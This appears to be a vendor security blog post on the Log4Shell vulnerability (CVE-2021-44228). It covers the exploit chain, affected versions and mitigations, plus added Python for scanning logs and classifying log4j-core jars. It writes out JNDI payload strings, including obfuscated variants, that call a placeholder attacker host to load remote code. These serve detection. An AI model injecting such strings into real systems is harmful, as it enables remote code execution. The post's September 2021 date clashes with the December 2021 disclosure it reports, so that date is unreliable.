
How this new zero-day RCE vulnerability in the Log4j Java library is setting the Internet on fire (CVE-2021-44228)

Java logging framework Log4j is used to generate logs and record the activity inside an application. The vulnerability can be exploited to allow unauthorised remote code execution on the affected servers. PingSafe can detect the Log4j vulnerability on your infrastructure without having an agent in your environment.

Security Research

On 9 December 2021 a new vulnerability, CVE-2021-44228, was publicly disclosed in Log4j, a popular open-source Java logging framework distributed under the Apache License 2.0. The vulnerability is remotely exploitable without authentication: anyone who can get attacker-controlled text into a log message can trigger it over the network, with no username or password required.

Due to the severity of this vulnerability, PingSafe strongly recommends that customers update the library as soon as possible.

Shortly after the vulnerability was published, PingSafe added a check for it to its scans so that affected assets raise an alert.

The Vulnerability:

Log4j is the logging framework many Java applications use to record their activity. The flaw sits in its message lookup feature: when a logged message contains a ${...} expression, Log4j evaluates it while formatting the message, and the jndi lookup in particular fetches an object from a remote naming service. An attacker who can get a crafted string into any log line can therefore make the server load and run malicious Java code. Attackers are actively exploiting this in the wild.

  • The attacker sends a request to any endpoint whose input ends up in a log line (a User-Agent header, a username field, a URL parameter) carrying a malicious payload.
  • The server logs the request with Log4j, and the logged data contains the payload: ${jndi:ldap://attacker-server.com} 

Here, “attacker-server.com” refers to the hacker-owned server.

  • Log4j evaluates the ${jndi:...} lookup while formatting the message, so the vulnerable server itself opens a connection to the attacker’s server.
  • The lookup goes through JNDI (Java Naming and Directory Interface); the attacker’s LDAP server answers with a reference pointing at a remote Java class file.
  • The JVM fetches that class file and instantiates it. This is the second-stage payload: code the attacker wrote now runs inside the server process, giving the attacker remote code execution.
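To make the chain above concrete from the defender’s side, here is an added example, written for this page and not taken from the original post or from PingSafe, in Python: a triage script that scans web-server access logs for the lookup string. Attackers rarely send the textbook ${jndi:ldap://...} form; they hide it behind Log4j’s own nested lookups (${lower:j}, the ${::-j} default-value syntax, ${upper:...}) and behind URL-encoding, so the detector expands those inner lookups the way Log4j would before searching for the jndi: prefix. The log lines and the attacker-server.com host are constructed samples, and all function names are this example’s own.

```python
"""Triage request logs for Log4Shell (CVE-2021-44228) lookup strings."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# An innermost ${...} expression: one with no nested "${" inside it.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The JNDI lookup once obfuscation is stripped: ${jndi:<scheme>:...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)

# Constructed sample access-log lines (not from any real incident); the host
# attacker-server.com is the placeholder used in the post above.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://attacker-server.com/a}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:${lower:l}dap://attacker-server.com/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://attacker-server.com/x}"',
    '10.0.0.10 - - [10/Dec/2021:12:00:05 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker-server.com%2Fa%7D HTTP/1.1" 200 "-" "curl/7.68.0"',
    '10.0.0.11 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:${upper:d}ns://attacker-server.com/x}"',
]


def _resolve_one(content: str) -> Optional[str]:
    """Expand one innermost lookup the way Log4j would; None means leave it as is."""
    prefix, _, arg = content.partition(":")
    if prefix.strip().lower() == "jndi":
        return None                       # the lookup we are hunting: keep it visible
    if ":-" in content:                   # ${key:-default} syntax, so ${::-j} becomes j
        return content.split(":-", 1)[1]
    if prefix.lower() == "lower":
        return arg.lower()
    if prefix.lower() == "upper":
        return arg.upper()
    return None                           # unknown lookup, no default: Log4j leaves the text


def normalize_lookups(text: str, max_passes: int = 32) -> str:
    """Expand innermost lookups pass by pass until nothing changes (bounded)."""
    for _ in range(max_passes):
        changed = False

        def repl(match):
            nonlocal changed
            resolved = _resolve_one(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def _balanced_lookup(text: str, start: int) -> str:
    """Return the ${...} expression starting at start, honouring nested braces."""
    depth = 0
    for i in range(start, len(text)):
        if text.startswith("${", i):
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
    return text[start:]


def find_jndi_lookup(line: str) -> Optional[Dict[str, str]]:
    """Return the scheme and de-obfuscated payload of a JNDI lookup in line, or None."""
    normalized = normalize_lookups(unquote(line))   # payloads often arrive URL-encoded
    match = JNDI.search(normalized)
    if match is None:
        return None
    return {"scheme": match.group(1).lower(),
            "payload": _balanced_lookup(normalized, match.start())}


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Run the detector over every line; each hit carries its 1-based line number."""
    hits: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        hit = find_jndi_lookup(line)
        if hit is not None:
            hits.append({"line": number, **hit})
    return hits


if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG_LINES):
        print("line %(line)d: %(scheme)s lookup -> %(payload)s" % hit)
```

Run it directly to print every hit with its line number, scheme and de-obfuscated payload. The normaliser handles only the lookups attackers typically abuse for obfuscation (lower, upper and the :- default), not every lookup Log4j offers, and a creative enough payload will still slip past a string matcher; use it to find hosts to investigate, not as a substitute for patching. Remember that the line is scanned after the server has already logged it, by which time the lookup has fired, so a hit means “check this host for an outbound LDAP, RMI or DNS connection to that address”, not “blocked”.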

Affected Systems:

Any application or service that logs attacker-controllable input through Log4j 2 is exposed, including frameworks that bundle it such as Apache Struts 2. Security researchers have already reported that the vulnerability could be triggered against services operated by Apple, Cloudflare, Twitter, and other large companies. 

It is highly recommended to upgrade the Log4j framework to 2.15.0 or later (2.15.0-rc2 was a release candidate of that fix). Apache has since published further 2.x releases that close related issues, so use the newest 2.x release available rather than stopping at 2.15.0.

The following versions of Log4j are impacted:

2.0-beta9 <= version <= 2.14.1

You can check the PingSafe dashboard under Asset Security to find out whether your servers are affected. 

[Screenshot: PingSafe Dashboard]

Steps for Remediation:

Apache has released a fixed version of Log4j on the official website. Download it and upgrade your services to the newest version. Where Log4j reaches your application transitively, through another library, framework or vendor product, that dependency has to be upgraded too.

Although upgrading to the latest version of Log4j is the recommended fix, servers that cannot be upgraded immediately can be hardened in place. For Log4j 2.10.0 through 2.14.1, disable message lookups by starting the JVM with the system property -Dlog4j2.formatMsgNoLookups=true (or by setting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true). That property did not exist before 2.10.0; for those older 2.x releases, remove the JndiLookup class from the classpath by deleting org/apache/logging/log4j/core/lookup/JndiLookup.class from log4j-core.jar. Neither step is required on the updated version, where message lookups are disabled by default. Treat both as stop-gaps: they reduce the exposure but were later shown not to eliminate it in every configuration, so the upgrade is still required.
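Upgrade and mitigation both start with knowing which jars on a host actually carry the vulnerable code. The following Python is an added example written for this page; it is not part of the original post and not PingSafe’s scanner. It walks a filesystem, identifies log4j-core jars by their Maven pom.properties, classifies each as vulnerable, mitigated or fixed using the version range above and the presence of JndiLookup.class, and implements the strip-the-class mitigation for releases older than 2.10.0. The jars it builds in a temporary directory are constructed fixtures with placeholder bytes, not real Log4j artifacts, and the function names are this example’s own.

```python
"""Find log4j-core jars on disk and classify them for CVE-2021-44228."""
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def log4j_core_version(jar: zipfile.ZipFile) -> Optional[Tuple[int, int, int]]:
    """Read log4j-core's version from its Maven pom.properties: "2.14.1" -> (2, 14, 1).
    Pre-release tags are dropped, so every 2.0 beta reads as (2, 0, 0) (conservative)."""
    if POM_PROPERTIES not in jar.namelist():
        return None                        # not log4j-core, or repackaged without Maven metadata
    for raw in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
        if raw.startswith("version="):
            match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", raw.split("=", 1)[1].strip())
            if match:
                return int(match.group(1)), int(match.group(2)), int(match.group(3) or 0)
    return None


def classify_jar(path: str) -> Optional[Dict[str, object]]:
    """Verdict for one log4j-core jar, or None if the jar is something else."""
    with zipfile.ZipFile(path) as jar:
        version = log4j_core_version(jar)
        if version is None:
            return None
        has_jndi_lookup = JNDI_LOOKUP_CLASS in jar.namelist()
    major, minor, patch = version
    if major != 2:
        status = "not-affected"            # CVE-2021-44228 is specific to the 2.x line
    elif (minor, patch) >= (15, 0):
        status = "fixed"                   # 2.15.0 or later, as the post recommends
    elif not has_jndi_lookup:
        status = "mitigated"               # JndiLookup.class has been stripped from the jar
    else:
        status = "vulnerable"              # 2.0 <= version <= 2.14.1 with the lookup class present
    return {"path": path, "version": "%d.%d.%d" % version,
            "status": status, "has_jndi_lookup": has_jndi_lookup}


def scan_tree(root: str) -> List[Dict[str, object]]:
    """Walk root and classify every plain .jar (jars nested in .war/.ear are not opened)."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(".jar"):
                verdict = classify_jar(os.path.join(dirpath, name))
                if verdict is not None:
                    findings.append(verdict)
    return sorted(findings, key=lambda f: str(f["path"]))


def strip_jndi_lookup(path: str) -> bool:
    """Rewrite the jar without JndiLookup.class: the mitigation for 2.x releases older
    than 2.10.0, which lack log4j2.formatMsgNoLookups. Returns True if it was removed."""
    tmp = path + ".tmp"
    removed = False
    with zipfile.ZipFile(path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_LOOKUP_CLASS:
                removed = True
                continue
            dst.writestr(info, src.read(info.filename))
    os.replace(tmp, path)                  # atomic swap; restart the JVM afterwards
    return removed


def build_sample_jars(root: str) -> None:
    """Constructed stand-in jars holding only the entries this scanner inspects
    (placeholder bytes, not real log4j artifacts or bytecode)."""
    def make(name: str, version: Optional[str], with_lookup: bool) -> None:
        with zipfile.ZipFile(os.path.join(root, name), "w") as jar:
            jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
            if version is not None:
                jar.writestr(POM_PROPERTIES, "groupId=org.apache.logging.log4j\n"
                             "artifactId=log4j-core\nversion=%s\n" % version)
            if with_lookup:
                jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    make("log4j-core-2.14.1.jar", "2.14.1", True)
    make("log4j-core-2.9.1.jar", "2.9.1", True)
    make("log4j-core-2.15.0.jar", "2.15.0", True)
    make("commons-io-2.11.0.jar", None, False)


def demo() -> Dict[str, Dict[str, str]]:
    """Scan the fixtures, strip the lookup class from the 2.9.1 jar, rescan."""
    with tempfile.TemporaryDirectory(prefix="log4j-scan-") as root:
        build_sample_jars(root)
        before = {os.path.basename(str(f["path"])): str(f["status"]) for f in scan_tree(root)}
        strip_jndi_lookup(os.path.join(root, "log4j-core-2.9.1.jar"))
        after = {os.path.basename(str(f["path"])): str(f["status"]) for f in scan_tree(root)}
    return {"before": before, "after": after}


if __name__ == "__main__":
    for phase, verdicts in demo().items():
        print(phase, verdicts)
```

Point scan_tree at a real application directory to get verdicts for actual jars; strip_jndi_lookup rewrites the jar in place, and the running JVM must be restarted before the change takes effect. The scanner only opens plain .jar files and does not descend into jars nested inside .war or .ear archives, nor does it recognise shaded or repackaged copies that lack Maven metadata, both of which are common, so a clean result is not proof of absence.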

References:

NVD - CVE-2021-44228: https://nvd.nist.gov/vuln/detail/CVE-2021-44228 

How can PingSafe help?

PingSafe can detect this Log4j vulnerability on your infrastructure without having an agent in place. To protect your cloud infrastructure from this as well as new zero-day vulnerabilities, request your early access to PingSafe at https://www.pingsafe.ai/company/contactus.


September 13, 2021
ABOUT THE AUTHOR
Anand Prakash

Anand Prakash is a prolific security researcher who is famous for finding bugs in some of the world’s most popular apps and websites. He thrives off of “bug bounties”, large cash prizes he earns from companies in exchange for successfully hacking their systems and showing them their security flaws. Anand is supremely good at what he does, having discovered vulnerabilities at companies like Facebook, Twitter, and Uber. For the past 5 years, Facebook has ranked Anand as one of their top bounty hunters. And on Twitter’s bounty program, he’s ranked #3 world-wide. Anand’s reputation as a hacker has led to him being featured in last year’s Forbes “30 under 30” for enterprise technology in Asia.
